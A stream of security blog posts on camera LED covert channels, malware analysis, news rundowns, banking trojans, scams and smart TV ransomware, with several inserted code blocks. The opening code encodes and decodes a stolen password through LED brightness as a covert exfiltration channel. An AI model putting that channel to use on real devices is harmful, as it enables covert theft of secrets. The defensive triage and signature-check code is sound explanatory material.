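        body = bits[start + len(PREAMBLE):]
        if len(body) < 16:                      # not even length + checksum left
            break
        length = from_bits(body[:8])[0]
        needed = 8 * (1 + length + 1)
        if len(body) < needed:                  # spurious preamble or truncated video
            break
        frame = from_bits(body[:needed])
        payload, expected = frame[1:1 + length], frame[1 + length]
        if checksum(payload) == expected:
            return payload
    raise ValueError("no valid frame found")

if __name__ == "__main__":
    secret = b"pw:hunter2"                      # constructed exfiltration payload
    trace = [30, 30, 35] + led_to_brightness(encode_frames(secret), noise=20) + [28]
    print(decode_brightness(trace))
```

At one bit per frame a 25 fps camera moves a few bytes per second, which is the regime the paper is about: slow, but enough for passwords and keys, and invisible to a human watching the camera. The same framing works in the other direction for C&C, with the attacker's IR LED as transmitter and the camera's own video stream as the receiver, exactly as the second quote describes.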

Also Read,

Canon DSLR Camera, The “Unlikely Likely” Candidate For Ransomware Infection

A New Malware Called Silex Targets IoT Devices

WannaHydra – The Latest Malware Threat For Android Devices

The post Blinking Red Light of Death for Cameras appeared first on .

Psychological Tricks of the Malware Trade

As a Professional Services Consultant, I have the pleasure of traveling all around the globe meeting clients and talking to a wide variety of IT security professionals who form the front line of defence against malware. One of my favorite topics is how people got their start in their careers in IT, but when I […]… Read More

The post Psychological Tricks of the Malware Trade appeared first on The State of Security.

Analytics 101

From today’s smart home applications to the autonomous vehicles of the future, the efficiency of automated decision-making is being widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have become real; it is important to understand that the terms are not interchangeable but describe techniques of increasing complexity and knowledge, applied to drive better decisions.

Distinguishing Between Machine Learning, Deep Learning and Artificial Intelligence

Put simply, analytics is the scientific process of transforming data into insight for making better decisions. Within the world of cybersecurity, this definition can be expanded to mean the collection and interpretation of security event data from multiple sources, and in different formats for identifying threat characteristics.

Simple explanations for each are as follows:

  • Machine Learning: Automated analytics that learn over time, recognizing patterns in data.  Key for cybersecurity because of the volume and velocity of Big Data.
  • Deep Learning: Uses many layers of input and output nodes (similar to brain neurons), with the ability to learn.  Typically makes use of the automation of Machine Learning.
  • Artificial Intelligence: The most complex and intelligent analytical technology, as a self-learning system applying complex algorithms which mimic human-brain processes such as anticipation, decision making, reasoning, and problem solving.

Benefits of Analytics within Cybersecurity

Big Data, the term coined in October 1997, is ubiquitous in cybersecurity as the volume, velocity and veracity of threats continue to explode. Security teams are overwhelmed by the immense volume of intelligence they must sift through to protect their environments from cyber threats. Analytics expand the capabilities of humans by sifting through enormous quantities of data and presenting it as actionable intelligence.

While the technologies must be used strategically and can be applied differently depending upon the problem at hand, here are some scenarios where human-machine teaming of analysts and analytic technologies can make all the difference:

  • Identify hidden malware with Machine Learning: Machine Learning algorithms recognize patterns far more quickly than your average human. This pattern recognition can detect behaviors that cause security breaches, whether known or unknown, periodically “learning” to become smarter. Machine Learning can be descriptive, diagnostic, predictive, or prescriptive in its analytic assessments, but typically is diagnostic and/or predictive in nature.
  • Defend against new threats with Deep Learning: Complex and multi-dimensional, Deep Learning reflects similar multi-faceted security behaviors in its actual algorithms; if the situation is complex, the algorithm is likely to be complex. It can detect, protect, and correct old or new threats by learning what is reasonable within any environment and identifying outliers and unique relationships.  Deep Learning can be descriptive, diagnostic, predictive, and prescriptive as well.
  • Anticipate threats with Artificial Intelligence: Artificial Intelligence uses reason and logic to understand its ecosystem. Like a human brain, AI considers value judgements and outcomes in determining good or bad, right or wrong.  It utilizes a number of complex analytics, including Deep Learning and Natural Language Processing (NLP). While Machine Learning and Deep Learning can span descriptive to prescriptive analytics, AI is extremely good at the more mature analytics of predictive and prescriptive.

With any security solution, therefore, it is important to identify the use case and ask “what problem are you trying to solve” to select Machine Learning, Deep Learning, or Artificial Intelligence analytics.  In fact, sometimes a combination of these approaches is required, like many McAfee products including McAfee Investigator.  Human-machine teaming as well as a layered approach to security can further help to detect, protect, and correct the most simple or complex of breaches, providing a complete solution for customers’ needs.

The post Analytics 101 appeared first on McAfee Blogs.

Understanding What Is Malware Analysis

What is malware analysis? It is the process of studying a particular piece of malware to learn how it works and what it can do. Malware code differs radically from one sample to the next, and samples carry many different functions, but the main purpose of these programs is to gain information from an infected device without the user's knowledge or authorization.

Malware Analysis Use Cases

Computer Security

One of the use cases for malware analysis is to determine whether an organization is indeed infected with malware, what type it is, and what its impact on the network is, so that a response team can formulate the right actions to get rid of it.

Malware Research

Understanding what malware is and how it works is one of the best defenses against it. This leads to a better understanding of malicious programs and of what different organizations can do to implement proactive security.

Extracting Indicators of Compromise

Security software vendors conduct malware analysis in bulk to find new indicators of compromise, which can help an organization defend itself against potential attacks.

Four Stages of Malware Analysis

In understanding what is malware analysis, it is important to look at the four stages it undergoes.

Automated Analysis

If you find a suspicious program inside the organization’s network, the easiest way to determine if it is a threat is to make use of fully automated analysis programs. They can quickly find out the functionality and purpose of a potential piece of malware. While not the most comprehensive solution, it is the fastest.

Static Property Analysis

Looking at the static properties of a malware sample provides a more in-depth look at what it can do. This is safe because examining static properties does not entail running the program. This step should reveal elementary-level indicators of compromise.
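As an added illustration of the static-property and indicator-extraction steps described above (this is not code from the original post; the sample bytes, the `Analyze` helper and the `update.example-c2.invalid` hostname are all constructed for the example), here is a small Go triage helper. It hashes the file, infers a coarse type from the leading magic bytes, pulls printable strings the way `strings(1)` does, and flags URL and IP-looking strings as candidate indicators, all without executing the sample:

```go
package main

import (
	"crypto/md5"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// StaticReport holds the properties a first-pass static triage collects
// without executing the sample.
type StaticReport struct {
	Size       int
	MD5        string
	SHA256     string
	FileType   string   // inferred from the leading magic bytes
	Strings    []string // printable ASCII runs of at least minLen characters
	Indicators []string // strings that look like network indicators (URLs, IPs)
}

const minLen = 6

// urlRe and ipRe catch only the simplest network indicators; a real
// triage pipeline would use a much richer pattern set.
var (
	urlRe = regexp.MustCompile(`https?://[A-Za-z0-9._/-]+`)
	ipRe  = regexp.MustCompile(`\b(?:\d{1,3}\.){3}\d{1,3}\b`)
)

// fileType maps the first few bytes of the sample to a coarse file type.
func fileType(b []byte) string {
	switch {
	case len(b) >= 2 && b[0] == 'M' && b[1] == 'Z':
		return "PE (Windows executable)"
	case len(b) >= 4 && string(b[:4]) == "\x7fELF":
		return "ELF (Unix executable)"
	case len(b) >= 4 && string(b[:4]) == "PK\x03\x04":
		return "ZIP container (APK/JAR/Office)"
	default:
		return "unknown"
	}
}

// extractStrings returns runs of printable ASCII of at least minLen bytes.
func extractStrings(b []byte) []string {
	var out []string
	var cur strings.Builder
	flush := func() {
		if cur.Len() >= minLen {
			out = append(out, cur.String())
		}
		cur.Reset()
	}
	for _, c := range b {
		if c >= 0x20 && c <= 0x7e {
			cur.WriteByte(c)
		} else {
			flush()
		}
	}
	flush()
	return out
}

// Analyze computes hashes, file type and string-derived indicators.
func Analyze(sample []byte) StaticReport {
	md := md5.Sum(sample)
	sh := sha256.Sum256(sample)
	strs := extractStrings(sample)
	var iocs []string
	for _, s := range strs {
		iocs = append(iocs, urlRe.FindAllString(s, -1)...)
		iocs = append(iocs, ipRe.FindAllString(s, -1)...)
	}
	return StaticReport{
		Size: len(sample), MD5: hex.EncodeToString(md[:]),
		SHA256: hex.EncodeToString(sh[:]), FileType: fileType(sample),
		Strings: strs, Indicators: iocs,
	}
}

// sampleBytes is a constructed, harmless stand-in for a suspicious file:
// a fake MZ header followed by the kind of strings a dropper might embed.
var sampleBytes = []byte("MZ\x90\x00\x03\x00\x00\x00" +
	"\x00\x00kernel32.dll\x00" +
	"http://update.example-c2.invalid/payload.bin\x00" +
	"\x01\x02" + "203.0.113.42:8080\x00" + "\xff\xfe")

func main() {
	r := Analyze(sampleBytes)
	fmt.Printf("type=%s size=%d sha256=%s\n", r.FileType, r.Size, r.SHA256)
	for _, ioc := range r.Indicators {
		fmt.Println("indicator:", ioc)
	}
}
```

The hashes are what you would submit to a reputation service or match against a feed, and the extracted indicators are the first candidates to check against proxy and DNS logs before anything is ever executed in a sandbox.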

Interactive Behavior Analysis

Placing a malicious program in an isolated laboratory environment allows safe observation of what it does. The information an analyst gathers from this allows them to replicate the behavior and implement automated tools for faster and easier discovery and prevention.

Reverse Manual Coding

The most comprehensive way to understand a malware sample is to manually reverse-engineer its code. This provides the knowledge of what the malware is, what it can do, and what the organization can implement in order to defend against it.


The post Understanding What Is Malware Analysis appeared first on .

Cyber News Rundown: Hookup App Exposes Users


Hookup App Leaks User Locations

Geo-location and other sensitive data have been leaked from the hookup app 3fun, exposing the information of more than 1.5 million users. While some dating apps use trilateration to find nearby users, 3fun showed location data capable of tracing a user to a specific building or floor. Though users had the option to disable coordinate tracking, that data was nevertheless stored and available through the app’s API. 3fun has since resolved the leak and has hopefully implemented stronger security measures considering the private nature of their clients’ activities.

Ransomware Attacks on DSLR Cameras

Malware authors continue to find new victims, as a ransomware variant has been found to be remotely attacking Canon DSLR cameras and demanding a ransom to regain access to the device. Researchers have found multiple vulnerabilities that could allow attackers to perform any number of critical functions on the cameras, including displaying a ransom note and remotely taking pictures with the camera. Fortunately, Canon has already begun issuing patches for some of its affected devices, though it’s taking longer to fully secure others.


Google Drive Exploit Allows Phishing Campaign to Flourish

A new phishing campaign has been discovered that uses a legitimate Google Drive account to send emails impersonating the CEO, asking the victim to open a Google Docs file and navigate to the phishing site’s landing page. Luckily for victims, the campaign has a few tells. The phony CEO email address uses a non-conforming naming convention and the email itself appears to be a hastily compiled template.

British Airways Data Leak

British Airways has again come under scrutiny, this time after it was discovered that their e-ticketing system was leaking sensitive passenger data. The leak stems from flight check-in links that were sent out to customers containing both their surname and booking confirmation numbers completely unencrypted within the URL. Even more worrisome, this type of vulnerability has been well-known since last February when several other airlines were found to have the same issue by the same security firm.

Android Trojan Adds New Functionality

Following in the footsteps of Anubis, an Android banking Trojan for which source code was recently revealed, Cerberus has quickly filled the void without actually borrowing much of that code. One major change is that Cerberus implemented a new method of checking if the device is physically moving or not, in hopes of avoiding detection by both the victim and any researchers who may be analyzing it. Additionally, this variant uses phishing overlays from several popular sites to further collect any login credentials or payment card data.

The post Cyber News Rundown: Hookup App Exposes Users appeared first on Webroot Blog.

The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data

A new banking trojan has emerged and is going after users’ Android devices. Dubbed Cerberus, this remote access trojan allows a distant attacker to take over an infected Android device, giving the attacker the ability to conduct overlay attacks, gain SMS control, and harvest the victim’s contact list. What’s more, the author of the Cerberus malware has decided to rent out the banking trojan to other cybercriminals as a means to spread these attacks.

According to The Hacker News, the author claims that this malware was written completely from scratch and doesn’t reuse code from other existing banking trojans. Researchers who analyzed a sample of the Cerberus trojan found that it has a fairly common list of features, including the ability to take screenshots, hijack SMS messages, steal contact lists, steal account credentials, and more.

When an Android device becomes infected with the Cerberus trojan, the malware hides its icon from the application drawer. Then, it disguises itself as Flash Player Service to gain accessibility permission. If permission is granted, Cerberus will automatically register the compromised device to its command-and-control server, allowing the attacker to control the device remotely. To steal a victim’s credit card number or banking information, Cerberus launches remote screen overlay attacks. This type of attack displays an overlay on top of legitimate mobile banking apps and tricks users into entering their credentials onto a fake login screen. What’s more, Cerberus has already developed overlay attacks for a total of 30 unique targets and banking apps.

So, what can Android users do to secure their devices from the Cerberus banking trojan? Check out the following tips to help keep your financial data safe:

  • Be careful what you download. Cerberus malware relies on social engineering tactics to make its way onto a victim’s device. Therefore, think twice about what you download or even plug into your device.
  • Click with caution. Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data appeared first on McAfee Blogs.

New “Norman” Malware Took Part in Large-Scale Cryptominer Infection

Researchers identified a large-scale cryptocurrency miner infection in which a new malware family called “Norman” took part. The Varonis Security Research team made the discovery while investigating a cryptominer infection at a mid-sized company. Here’s what they found through this effort: Almost every server and workstation was infected with malware. Most were generic variants of […]… Read More

The post New “Norman” Malware Took Part in Large-Scale Cryptominer Infection appeared first on The State of Security.

Smashing Security #141: Black Hat and Bridezillas

Say cheese to ransomware on your camera! A sponsored speech at Black Hat causes uproar, and should you trust that Lightning cable you’re about to plug into your MacBook?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire’s Dave Bittner.

Cyber News Rundown: Children’s Tablets Show Vulnerabilities


Children’s Tablets Leave Users Vulnerable

At least one LeapPad tablet designed specifically for children has been found to harbor critical vulnerabilities in the app Pet Chat that could allow unauthorized access to online traffic. The vulnerabilities could be used to locate the tablet’s owner, because the app creates a temporary WiFi network to help the user connect with other devices in the area. In addition to the remote access, local attackers would be able to send messages to children through non-HTTPS communications.

UK Universities Lacking Security

A recent study found that nearly 65% of the UK’s top universities are currently operating with sub-standard cybersecurity, especially during the time that students would be sitting for final exams. Among the remaining 35% of universities that did have some domain authentication, only 5% of those were using settings that would fully block phishing emails. If UK university students are requesting any login changes, they should be cautious when opening anything they receive, as the message may be compromised.

Intel CPU Patch Issued by Microsoft

Microsoft has just released a patch for an Intel CPU vulnerability that was brought to light in 2012. The flaw could have been used to read memory data from the device. The researchers who discovered it found they could easily leak sensitive kernel memory data into normal user-mode operations, even though a system normally doesn’t allow this. Additionally, this vulnerability involves speculative execution, which is when the processor begins executing certain operations pre-emptively and simply discards the results of those that turn out not to be needed.

AT&T Employees Bribed to Unlock Phones

Employees of AT&T were found to be illicitly installing hardware onto corporate systems that would allow an attacker to unlock phones that were prevented from being used on other mobile providers. Even though some of the conspirators were eventually fired, many continued to work from within and from outside the company to further compromise nearly 2 million individual devices until the scam, which had been ongoing for more than five years, was discovered.

Mobile Bank Customers’ PINs Exposed

Customers of Monzo, a mobile-only bank in the UK, are being warned to change their PINs after many customers’ PINs were leaked into internal log files. Fortunately, the data wasn’t made available outside of the company, and the problem of PINs being stored in an alternate location has been resolved. Even after the company fixed the data leak, though, many customers were still suspicious when receiving an email informing them of the PIN reset issue.

The post Cyber News Rundown: Children’s Tablets Show Vulnerabilities appeared first on Webroot Blog.

Enterprises can begin securing their endpoints by following these five simple steps.


Sustainable enterprise security is both a great practice and a core business process. Enterprises are increasingly becoming aware of the diverse and intense nature of the threats that exist in the cybersphere and the damage they can cause – that’s where strong enterprise security solutions come in.

This is step one – enterprise security consists of ever-evolving complex layers that are never in stasis. Hence, after every cycle, security mechanisms only tend to get stronger. However, cyberattackers are getting extremely savvy and sophisticated in their malware onslaught, ensuring that attacks are timed to penetrate endpoints during cybersecurity transitional phases.

Hence, here are some easy-to-prevent flaws that can creep in when enterprises try to secure their endpoints.

  1. Lack of proper enterprise security policies

Enterprise security policies cannot be ad-hoc – this process needs to be implemented right from the beginning, and that is where strong enterprise security takes root. The best strategies can be ineffective if they are not backed up with strong security policies.

When it comes to enterprise security, organizations must be proactive in drafting policies. The crux of these security policies should consist of employee dos and don’ts, workforce collaboration that supports cybersecurity, and human resource initiatives on malware literacy, among many others, and they should be complied with and regularly updated so that business security is never at risk.

  2. Inability to prioritize security integration of mobiles into enterprise networks

Mobile phones as work devices are seeing increasing adoption in the enterprise. Employees who leverage this facility need to bind their devices to enterprise security controls so that business-critical data is not compromised. Due to rising attacks on mobile devices, Enterprise Mobility Management (EMM) has become a must for businesses of all sizes that allow this facility. Solutions like Seqrite mSuite are excellent solutions through which employees can safely access productivity apps on BYOD (Bring Your Own Device) or CYOD (Choose Your Own Device) platforms while maintaining strong security.

  3. Compliance with regulations

Most companies nowadays operate under some sort of regulatory control of their data, for example HIPAA for private health information or FERPA for student records. Often this information is stored in the cloud with the intention of keeping this ultra-sensitive data hidden from cybercriminals. As such, leaking of this information can have serious consequences – hence enterprises should be vigilant about compliance regarding the nature of the data and its storage.

  4. Faulty access permission

Enterprises can build the strongest firewalls, on par with military standards, but the framework will collapse if appropriate access control mechanisms are not put in place. Essentially, system administrators need to grant precise access to business users based on their role in the organization. This ensures that insider breaches do not happen and sensitive information remains confidential. Also, if hackers gain direct access to employee systems, they can break in and cause widespread damage to the business.

  5. Not taking employees into confidence

Employees are the backbone of maintaining cybersecurity discipline. Hence, enterprises should take employees into confidence as they look to implement cybersecurity solutions. Employees must be made aware of the dangers of weak enterprise security, the steps they can take, and the warning signs they should look for. Since cyberthreats are highly dynamic and dangerous, if organizations don’t train employees properly, those employees are highly likely to become the internal agents and channels of a cyberattack.

After covering these flaws internally, enterprises should choose to invest in proven cybersecurity solutions such as Seqrite Endpoint Security (EPS) which offers a simple and comprehensive platform integrating several advanced technologies in one place for protection against advanced cyber threats.

EPS also comes packed with other vital features such as –

  • Web Filtering
  • Application Control
  • Vulnerability Scan
  • Patch Management
  • File Activity Monitor
  • IDS/IPS Protection

The post Enterprises can begin securing their endpoints by following these five simple steps. appeared first on Seqrite Blog.

Be Wary of WhatsApp Messages Offering 1000GB of Free Data

Global messaging giant WhatsApp turned 10 years old this year. It’s not unusual for companies to provide loyal customers or members with gifts to show their appreciation during these milestones. Unfortunately, cybercriminals are using this as a ploy to carry out their malicious schemes. According to Forbes, security researchers have discovered a fraudulent message promising users 1000GB of free internet data, which is a scam bringing in ad click revenue for cybercriminals.

Let’s dive into the details of this suspicious message. The text reads “WhatsApp Offers 1000GB Free Internet!” and includes a link to click on for more details. However, the link provided doesn’t use an official WhatsApp domain. Many users might find this confusing since some businesses do run their promotions through third-party organizations. Forbes states that once a user clicks on the link, they are taken to a landing page that reads “We offer you 1000 GB free internet without Wi-Fi! On the occasion of our 10th anniversary of WhatsApp.” To make the user feel like they need to act fast, the landing page also displays a bright yellow countdown sticker warning that there are a limited number of awards left.

As of now, it doesn’t appear that the link spreads malware or scrapes users’ personal information. However, the scam could eventually evolve into a phishing tactic. Additionally, the more users click on the fraudulent link, the more the cybercriminals behind this scheme rack up bogus ad clicks. This ultimately brings in revenue for the cybercrooks, encouraging them to continue creating these types of scams. For example, the domain being used by the scammers behind the WhatsApp message also hosts other fake brand-led promotional offers for Adidas, Nestle, Rolex, and more.

So, what can users do to prevent falling for these phony ads? Check out the following tips to help you stay secure:

  • Avoid interacting with suspicious messages. Err on the side of caution and don’t respond to direct messages from a company that seem out of the ordinary. If you want to know if a company is participating in a promotional offer, it is best to go directly to their official site to get more information.
  • Be careful what you click on. If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Be Wary of WhatsApp Messages Offering 1000GB of Free Data appeared first on McAfee Blogs.

Can a Smart TV Get a Virus?

Asking the real questions here – can a smart TV get a virus? We’re about to find out. If you’re into gaming or streaming, you’ve probably bought yourself a wide QLED.

Smart TVs are awesome since they give you access to tons of content without the need to use an intermediary – remember when you had to hook up your desktop or laptop to the TV just to see a movie?

Since most smart TVs out there run an OS akin to Android, the question of whether or not TVs can get viruses seems only natural. So, if you’re still worried about someone hijacking your smart TV during an epic streaming night, check out this guide. Enjoy!

It started with a tweet…

Like every ‘great’ Internet smash, the entire smart TV malware gig started with a tweet from Samsung. Try as I might, I couldn’t get ahold of the said message since the company was kind enough to delete it not long after it went live. However, it did not go away quietly (into the night) – pretty soon, people began wondering whether or not their TVs are safe.

Per Samsung’s statements, the tweet was part of their cybersecurity awareness campaign.

Awareness or not, it does pose a rather interesting question: can a smart TV get a virus? Most people would say the answer is “no”, since smart TVs do not tap into the same resources as PCs, Macs, tablets, or smartphones. True, but not very convincing.

So, I started poking around to seek the answer to this elusive question. Long story short – yes, your smart TV can get a virus if you download stuff that, well, you shouldn’t download. Android TVs are more vulnerable compared to the non-Android models since they have full access to Google Play’s apps library.

Yes, one wrong download and you can probably end up with a bricked set or even with a compromised router. Daunting as it may seem, the chances of this actually happening are slim to none.

Of course, many agree that any kind of electronic device can be hacked, but is it really worth it? Think of it this way: if someone were to hack his way into your PC, he could steal precious stuff like financial info. That’s a prize worth having.


Stepping up the game

First of all, a wide-spread cyberattack would have to be capable of targeting several types of chipsets. It’s true that most smart TVs use ARM- or MIPS-based cores, but the technology used to bring the sets to life differs from that employed to build PCs or smartphones.

That would be the first limitation. The second one would be the fact that all TV operating systems are written in ‘read-only’ form, which means that the set itself can view and read the code, but it cannot write or overwrite on its own accord.

So, what does that even mean? Well, it kind of translates to someone having to redo the whole code to change the attribute from ‘read-only’ to ‘read-and-write’. Sounds easy enough on paper, but reality says otherwise; no one’s going through that much trouble just to hack a TV set!

Another ‘countermeasure’ smart TV manufacturers use is the digital signature. Each time a new firmware update becomes available, it simply overwrites the old one. Being digitally signed means that a firmware image which has been tampered with fails the signature check and is rejected before it is installed; and in the event that malware does find its way inside your TV, it will simply be picked up by the in-built antivirus and deleted.

Now, even if the malware manages to evade detection (and that’s a very big ‘if’), worst case scenario – it will gain access to the TV’s config & general settings sections. Not much damage it can do from there (maybe trigger a voltage overload in those CPU cores or something).

So can a smart TV get a virus?

Not quite – TVs, just like any other electronics, CAN become infected. Well, that’s a bummer – how can a device get and not get infected at the same time? Let me try to clear things up a bit. So, for a TV to get viruses, Trojans, or any kind of ransomware, you would need to perform a specific set of actions.

For instance, if you insert a USB flash stick that harbors a bug, then your smart TV gets infected. It’s as easy as that. There’s even a story to go along with that claim; several of them, actually.

Fishing for Trojans

Apparently, in 2015, a Tom’s Guide user reported that he unwittingly transformed his Samsung smart TV into a breeding pool for trojans. As the story goes, the user plugged a USB stick into the TV without knowing that the stick was infected with win32.waldek.ACL, a trojan notorious for its ability to reconfigure the affected machine’s DNS and to restrict access to some websites.

Nothing appears to have happened to the TV, but once the user inspected the thumb drive on a computer, he saw that it was indeed infected with that particular trojan. His AV managed to bust the win32 variant, without any issues.

However, each time he would plug the stick into his TV and then back into the PC, his AV would detect an infection. I don’t know how this story ends, but I guess returning the set to its factory setting can root out just about any kind of malware from the smart TV’s buffer.

There are other accounts of smart TVs getting bitten by the ‘love bug’.

When gaming turns…viral

During the same year, Candid Wueest, a cybersecurity researcher, managed to prove what others couldn’t: that someone can hold your TV for ransom. In other words, ransomware’s universal. Now, keep in mind that Wueest’s ‘experiment’ worked because, well, he wanted it to work.

Here’s how it went down: in his demo, Wueest managed to infect a Sony Android TV with ransomware using a Man-in-the-Middle attack, by replacing a game installation file with ransomware. As a result, the TV locked itself up. What’s even worse is that you can’t do anything because there’s no way of actually clicking on the instructions’ link to see the payment details.

So, yes, it’s possible, but certain conditions must be met. First of all, the researcher was able to access the network path; IRL that could happen if the hacker was either on the same network as his victim or hijacks the victim’s DNS resolution.

Second, before starting this unlikely experiment, he enabled the TV’s Android ADB debugging feature, which granted him access to some pretty advanced features. Last, but not least, he knew where the experiment was headed and how it would end.

He eventually purged the ransomware by using the ADB shell. Lesson learned – it can happen, but there’s a boorishly long list of ifs to go along with that assumption.
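The digital-signature countermeasure described earlier and the file-swap in Wueest’s demo are two sides of the same check, so here is one added example covering both (this is not code from the original post or from any TV vendor; `SignUpdate`, `VerifyUpdate` and `Tamper` are hypothetical names and the image bytes are constructed). It uses the Go standard library’s Ed25519 to sign an update image on the vendor side and verify it on the device side, and shows that a file replaced on the network path fails verification against the pinned vendor key even though the attacker never touched the signature:

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// UpdatePackage is the shape a signed firmware or app update takes:
// the image itself plus a vendor signature over its digest.
type UpdatePackage struct {
	Image     []byte
	Signature []byte
}

var ErrBadSignature = errors.New("update rejected: signature does not verify")

// SignUpdate is the vendor-side step (hypothetical helper): hash the image
// and sign the digest with the vendor's private key.
func SignUpdate(priv ed25519.PrivateKey, image []byte) UpdatePackage {
	digest := sha256.Sum256(image)
	return UpdatePackage{Image: image, Signature: ed25519.Sign(priv, digest[:])}
}

// VerifyUpdate is the device-side step: recompute the digest over the bytes
// actually received and check the signature against the vendor public key
// pinned in the device. Anything altered in transit fails here, before it
// is written to flash or executed.
func VerifyUpdate(pub ed25519.PublicKey, pkg UpdatePackage) error {
	digest := sha256.Sum256(pkg.Image)
	if !ed25519.Verify(pub, digest[:], pkg.Signature) {
		return ErrBadSignature
	}
	return nil
}

// Tamper models an on-path replacement of the downloaded file, as in the
// demo above: the image changes but the signature is left as-is, because
// the attacker does not hold the vendor's private key.
func Tamper(pkg UpdatePackage, replacement []byte) UpdatePackage {
	return UpdatePackage{Image: replacement, Signature: pkg.Signature}
}

// Demo runs both paths and reports whether each image was accepted.
func Demo() (genuineOK bool, tamperedOK bool, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return false, false, err
	}
	// Constructed placeholder bytes standing in for a game installer.
	genuine := []byte("constructed: game installer v1.2 (harmless placeholder bytes)")
	pkg := SignUpdate(priv, genuine)
	genuineOK = VerifyUpdate(pub, pkg) == nil

	// Constructed placeholder bytes standing in for the swapped-in file.
	swapped := Tamper(pkg, []byte("constructed: different bytes standing in for a swapped file"))
	tamperedOK = VerifyUpdate(pub, swapped) == nil
	return genuineOK, tamperedOK, nil
}

func main() {
	g, t, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine image accepted: %v\ntampered image accepted: %v\n", g, t)
}
```

The point for the ADB caveat in the text is the same: with debugging enabled the researcher could push the file past this check by hand, which is exactly why leaving ADB off on a consumer set matters.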

Sis’s sys got pwned

The winter of 2016 brings us yet another case of what appears to be a ransomware infiltration. Lucky for us, this wasn’t another experiment, but the real McCoy. According to Reddit user u/tell_me_im_funny, his sister’s LG smart TV became infected while she was navigating on the TV’s web browser.

A couple of minutes later, the set got ‘bricked’, the only thing capable of displaying would be a message reading “Your computer has been infected, please gib money to fix it.”

This time, there was no ADB shell, no access to the network pathway, and no one to call for help. In a later ad-lib, the user said that he managed to ‘unbrick’ his sister’s TV by performing a hard-reset (returning the TV to the factory settings).

Netflix is so gauche

And in the hope that I haven’t bored you to death with my cybersec ‘penny dreadfuls’, the last story comes all the way from Kansas. Darren Cauthon, the protagonist and a software dev in his spare time, said that back in 2015, his Google Android-powered smart TV picked up a bug during his attempt at downloading a movie-streaming application.

Cauthon recalled streaming some flick when all of a sudden, the screen froze. Naturally, he tried rebooting the TV. However, upon restart, instead of the familiar LG start screen, Cauthon was met by a message allegedly sent by the Federal Bureau of Investigation. Apparently, the software dev was informed that due to some “suspicious files”, the device has been locked. The full text reads:

Department of Justice
Federal Bureau of Investigation

FBI Headquarters

Washington DC Department, USA

As a result of full scanning of your device, some suspicious files have been found and your attendance of the forbidden pornographic sites has been fixed. For this reason, your device has been locked. Information on your location and snapshots containing your face have been uploaded on the FBI Cyber Crime Department’s Datacenter.

Of course, Cauthon’s first thought was ransomware. And yes, his hunch was right – after downloading the wrong movie-streaming app, his TV became infected with FLocker, otherwise known as Dogspectus or Frantic Locker, a Cyber.Police ransomware variant. Since the bug made it into his TV and not his PC or phone, Cauthon was able to get rid of it by returning the set to its factory settings.

What’s there to be done if your TV does get a virus?

For the sake of argument, let’s say your smart TV picks up a trojan or ransomware. What are you going to do then? Well, there are several ways to root out malware from your device. Check these out.

1. Force-scan the TV and attached storage devices

Most modern smart TVs have in-built antivirus software. Sure, it’s signature-based and wouldn’t make much of a difference in case of Advanced Persistent Threats, but still better than nothing.

Keep in mind that your TV’s AV is not as sophisticated as the one on your computer. Certain functions like auto-scan or scheduled scans may not be available. So, it’s up to you to conduct periodical scans of your device. Here’s what to do:

Step 1. Navigate to Settings using your remote.

Step 2. Go to General Settings.

Step 3. Head to System Manager.

Step 4. Under Smart Security, click on Scan.

Step 5. Enjoy a virus-free streaming experience!

(*) This method applies to Samsung smart TVs. For other brands, please consult the user’s manual. Look for things like “smart security”, “smart hub”, or “online security”.

2. Return TV to factory settings

Just like Cauthon, you could return your smart TV to factory settings in case of a ransomware infection. Bear in mind that in a Denial-of-Service attack, some or all of your TV’s functions will be disabled. This means that you will need to find an alternative way to do that. My advice to you would be to contact your brand’s customer service for technical info.

Now, if you’re the ‘proud’ owner of a Samsung smart TV just like I am, you can find the reset-to-factory-settings option in Support, under Self-Diagnosis. Keep in mind that you might be required to provide your PIN code to complete the operation (if you haven’t messed around with the security settings, the default PIN is 0000). Bonne chance!

3. Regular software updates

Yes, I know that this tip does not qualify as a fix, but you know how it goes with that proverbial ounce of prevention. Anyway, keep your TV’s firmware and all downloaded apps up to date. Almost all smart TVs have an auto-updater or, rather, semi-auto update feature since it will prompt you to install the latest version.

If you have an older set, try checking at least once per month for any updates. Do the same for your apps. Why keep everything up to date? Because over 80 percent of malware infections occur due to outdated apps which turn into breach points.

4. Wired over wireless

If you can choose between a wired and a wireless connection, go with the first. Wired connections are harder to hack compared to the wireless ones. Of course, there’s the entire cable management issue, but everything can be solved with a bit of patience and some cable ties.

5. Avoid shady vendors

Now, if that TV really can’t wait, do yourself a favor and buy yours from a legit vendor. Don’t fall for bogus discounts, giveaways, or whatnots because that’s how you end up with rip-offs and malware-infected devices. Lesson learned – say YES to Samsung or LG and NO to Samysung or MG.

6. Refrain from plugging (infected) USB sticks into your TV

Seems pretty obvious, but I still need to say it: never, ever stick a malware-infected memory stick or portable hard-drive into your smart TV. It would be wise to run a quick scan on your PC or Mac before plugging in the stick. And I wouldn’t recommend using sticks other than your own.

7. Ditch generic web browsers

